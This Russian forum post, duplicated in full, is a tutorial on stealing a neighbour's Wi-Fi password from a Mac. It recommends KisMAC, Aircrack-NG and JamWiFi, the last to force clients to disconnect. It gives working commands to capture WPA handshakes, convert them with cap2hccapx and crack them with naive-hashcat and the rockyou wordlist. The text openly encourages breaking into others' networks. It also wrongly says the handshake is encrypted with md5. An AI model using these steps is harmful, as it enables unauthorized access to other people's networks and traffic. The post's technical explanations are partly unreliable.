zodiak
Пользователь
- Регистрация
- 11.12.16
- Сообщения
- 236
- Реакции
- 191
- Баллы
- 63
- Нарушения
- 0 / 5
Используем чужой интернет или «Скажи мне свой пароль от Wi-Fi»
Сложно не взять то, что “плохо лежит”. Если хочется пользоваться чужим интернетом, почему бы не умыкнуть пароль от Wi-Fi соседа?
Узнать пароль от Wi-Fi в современном мире давно не является проблемой при прямых руках и умении пользоваться Гуглом. Но в этот раз пойдет речь о Яблочной ОС и ее возможностях, которые могут помочь в задуманном.
Лет десять назад можно было совершенно безнаказанно и очень быстро заполучить пароли не только от роутеров, но и от учетных записей почты, социальной сети и, не дай бог, учетной записи в банке. Запускаем любой сниффер на пару часов в общественном месте и вы “в дамках”. Однако сейчас даже у фуд-блогера Васи есть https, что накладывает свои ограничения. А шифрование (wep, wpa2 и т. д.), которое “защищает” от злодеев, не так уж и защищает.
Переходим к рассмотрению способов получить пароль от Wi-Fi.
Сторонний софт
Не позабыт не позаброшен KisMAC – очень полезное и мощное приложение, собравшее в себе все необходимое для взлома. Драйверы Wi-Fi карт уже в программе, так что одной головной болью меньше. Из одного графического интерфейса выполняется как сканирование, так и сбор + анализ трафика (хотя это не так интересно для тру кодеров, но все же
Программа выполняет функции сканера и сниффера, с модулем GPS обозначает найденное на карте, записывает дамп. Это не полный перечень ее возможностей, но одни из наиболее важных.
Другой маст хэв палочкой-выручалочкой является Aircrack-NG. Но вот с ним придется повозиться чуть дольше, чем с KisMAC.
По сути, это не одна программа, а целый набор, который обнаруживает, анализирует, перехватывает и взламывает Wi-Fi. С его помощью можно быть не только бэд боем, но и просто искать уязвимости в беспроводных сетях, что поможет обезопасить свой интернет от таких же хацкеров.
Программа кроссплатформенная, так что подойдет для Mac OS, Linux и Windows. Aircrack-NG есть в двух вариантах:
Подручные средства
При любой активности клиент-серверной тематики, при обращении клиента происходит рукопожатие, будь то криптография, ключ-карта или подключение к роутеру. Это рукопожатие зашифровано каким-нибудь md5. Если начать “вынюхивать” что-то, то получим только хэш с набором символов, из которого ничего полезного не вытащить. Но есть специальное ПО, которое поможет превратить этот самый хэш в полезности.
В Mac OS утилита “Беспроводная диагностика” творит чудеса. Если кликнуть по значку Wi-Fi зажав клавишу Alt, то в контекстном меню можно выбрать эту программку.
В этой менюшке много полезной информации об установленном радиомодуле, MAC-адресе и имени интерфейса.
В следующем меню есть масса полезных утилит, но нам нужны только сканирование (будет показывать все сети с дополнительными параметрами в радиусе доступности) и анализатор (Mac-овская реализация сниффера по какой-нибудь частоте или каналу).
Интерфейс очень простой и интуитивно понятный (плюсик в копилку Apple), так что мучиться с пошаговыми инструкциями и поисками видео-туториалов в интернете не придется. Все предельно просто.
Если выбрать интересующую частоту, ширину канала и нажать на кнопку “Начать” в анализаторе, наш Wi-Fi модуль начнет принимать все доступные сети и дампить полученную информацию в файлик /var/tmp/*.wcap.
Эти файлики содержат timestamp, кучу трафика и искомые рукопожатия. Для выполнения поставленной задачи нужно обрабатывать только рукопожатия, а это происходит в момент подключения устройства к роутеру. Можно сидеть и снифферить часами, а можно использовать утилиту JamWiFi, которая может заставить отключиться всех подключенных клиентов для реаутентификации. В этот момент, вступаем мы с товарищем “нюхачом” и получаем наше рукопожатие.
После этого на наше Яблоко ставим naive-hashcat и hashcat-utils.
Используем бинарник cap2hccapx для конвертации дампа, чтобы остались только хэши. Дальше все разбивается на 3 своеобразных блока.
1. Скачивание:
1. git clone https://github.com/hashcat/hashcat-utils.git
2. Cloning into 'hashcat-utils'...
3. remote: Counting objects: 403, done.
4. remote: Total 403 (delta 0), reused 0 (delta 0), pack-reused 403
5. Receiving objects: 100% (403/403), 114.23 KiB | 61.00 KiB/s, done.
6. Resolving deltas: 100% (257/257), done.<br>
2. Сбор *.bin’s:
1. cd hashcat-utils/src/ && make
2. \rm -f ../bin/*
3. rm -f *.bin *.exe
4. cc -Wall -W -pipe -O2 -std=gnu99 -o cap2hccapx.bin cap2hccapx.c
5. cc -Wall -W -pipe -O2 -std=gnu99 -o cleanup-rules.bin cleanup-rules.c
6. _
7. cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsr.bin strip-bsr.c
8. cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsn.bin strip-bsn.c
3. Конвертация:
1./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapx
В дампе находим два рукопожатия (работаем по методу handshake’s) и используем данный инструмент:
1. git clone https://github.com/brannondorsey/naive-hashcat
2. cd naive-hashcat
3. ./build-hashcat-osx.sh
4. curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/
5. download/data/rockyou.txt
6. HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh
Чем производительнее железо, тем выше скорость обработки хэшей. Все взломанное добро складируется в файлик home-wifi.txt, в котором нас уже ждет сюрприз.
Заключение
Цель достигнута.
Очень хорошо, что есть такие операционные системы, которые позволяют развлечься с пользой для дела. Используйте с умом Mac OS и Kali – это ваши лучшие друзья, если соберетесь еще кого-то поломать.
Сложно не взять то, что “плохо лежит”. Если хочется пользоваться чужим интернетом, почему бы не умыкнуть пароль от Wi-Fi соседа?
Узнать пароль от Wi-Fi в современном мире давно не является проблемой при прямых руках и умении пользоваться Гуглом. Но в этот раз пойдет речь о Яблочной ОС и ее возможностях, которые могут помочь в задуманном.
Лет десять назад можно было совершенно безнаказанно и очень быстро заполучить пароли не только от роутеров, но и от учетных записей почты, социальной сети и, не дай бог, учетной записи в банке. Запускаем любой сниффер на пару часов в общественном месте и вы “в дамках”. Однако сейчас даже у фуд-блогера Васи есть https, что накладывает свои ограничения. А шифрование (wep, wpa2 и т. д.), которое “защищает” от злодеев, не так уж и защищает.
Переходим к рассмотрению способов получить пароль от Wi-Fi.
Сторонний софт
Не позабыт не позаброшен KisMAC – очень полезное и мощное приложение, собравшее в себе все необходимое для взлома. Драйверы Wi-Fi карт уже в программе, так что одной головной болью меньше. Из одного графического интерфейса выполняется как сканирование, так и сбор + анализ трафика (хотя это не так интересно для тру кодеров, но все же

Программа выполняет функции сканера и сниффера, с модулем GPS обозначает найденное на карте, записывает дамп. Это не полный перечень ее возможностей, но одни из наиболее важных.
Другой маст хэв палочкой-выручалочкой является Aircrack-NG. Но вот с ним придется повозиться чуть дольше, чем с KisMAC.

По сути, это не одна программа, а целый набор, который обнаруживает, анализирует, перехватывает и взламывает Wi-Fi. С его помощью можно быть не только бэд боем, но и просто искать уязвимости в беспроводных сетях, что поможет обезопасить свой интернет от таких же хацкеров.
Программа кроссплатформенная, так что подойдет для Mac OS, Linux и Windows. Aircrack-NG есть в двух вариантах:
- консольный;
- графический.
Подручные средства
При любой активности клиент-серверной тематики, при обращении клиента происходит рукопожатие, будь то криптография, ключ-карта или подключение к роутеру. Это рукопожатие зашифровано каким-нибудь md5. Если начать “вынюхивать” что-то, то получим только хэш с набором символов, из которого ничего полезного не вытащить. Но есть специальное ПО, которое поможет превратить этот самый хэш в полезности.
В Mac OS утилита “Беспроводная диагностика” творит чудеса. Если кликнуть по значку Wi-Fi зажав клавишу Alt, то в контекстном меню можно выбрать эту программку.

В этой менюшке много полезной информации об установленном радиомодуле, MAC-адресе и имени интерфейса.

В следующем меню есть масса полезных утилит, но нам нужны только сканирование (будет показывать все сети с дополнительными параметрами в радиусе доступности) и анализатор (Mac-овская реализация сниффера по какой-нибудь частоте или каналу).
Интерфейс очень простой и интуитивно понятный (плюсик в копилку Apple), так что мучиться с пошаговыми инструкциями и поисками видео-туториалов в интернете не придется. Все предельно просто.

Если выбрать интересующую частоту, ширину канала и нажать на кнопку “Начать” в анализаторе, наш Wi-Fi модуль начнет принимать все доступные сети и дампить полученную информацию в файлик /var/tmp/*.wcap.
Эти файлики содержат timestamp, кучу трафика и искомые рукопожатия. Для выполнения поставленной задачи нужно обрабатывать только рукопожатия, а это происходит в момент подключения устройства к роутеру. Можно сидеть и снифферить часами, а можно использовать утилиту JamWiFi, которая может заставить отключиться всех подключенных клиентов для реаутентификации. В этот момент, вступаем мы с товарищем “нюхачом” и получаем наше рукопожатие.
После этого на наше Яблоко ставим naive-hashcat и hashcat-utils.
Используем бинарник cap2hccapx для конвертации дампа, чтобы остались только хэши. Дальше все разбивается на 3 своеобразных блока.
1. Скачивание:
1. git clone https://github.com/hashcat/hashcat-utils.git
2. Cloning into 'hashcat-utils'...
3. remote: Counting objects: 403, done.
4. remote: Total 403 (delta 0), reused 0 (delta 0), pack-reused 403
5. Receiving objects: 100% (403/403), 114.23 KiB | 61.00 KiB/s, done.
6. Resolving deltas: 100% (257/257), done.<br>
2. Сбор *.bin’s:
1. cd hashcat-utils/src/ && make
2. \rm -f ../bin/*
3. rm -f *.bin *.exe
4. cc -Wall -W -pipe -O2 -std=gnu99 -o cap2hccapx.bin cap2hccapx.c
5. cc -Wall -W -pipe -O2 -std=gnu99 -o cleanup-rules.bin cleanup-rules.c
6. _
7. cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsr.bin strip-bsr.c
8. cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsn.bin strip-bsn.c
3. Конвертация:
1./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapx
В дампе находим два рукопожатия (работаем по методу handshake’s) и используем данный инструмент:
1. git clone https://github.com/brannondorsey/naive-hashcat
2. cd naive-hashcat
3. ./build-hashcat-osx.sh
4. curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/
5. download/data/rockyou.txt
6. HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh
Чем производительнее железо, тем выше скорость обработки хэшей. Все взломанное добро складируется в файлик home-wifi.txt, в котором нас уже ждет сюрприз.
Заключение
Цель достигнута.
Очень хорошо, что есть такие операционные системы, которые позволяют развлечься с пользой для дела. Используйте с умом Mac OS и Kali – это ваши лучшие друзья, если соберетесь еще кого-то поломать.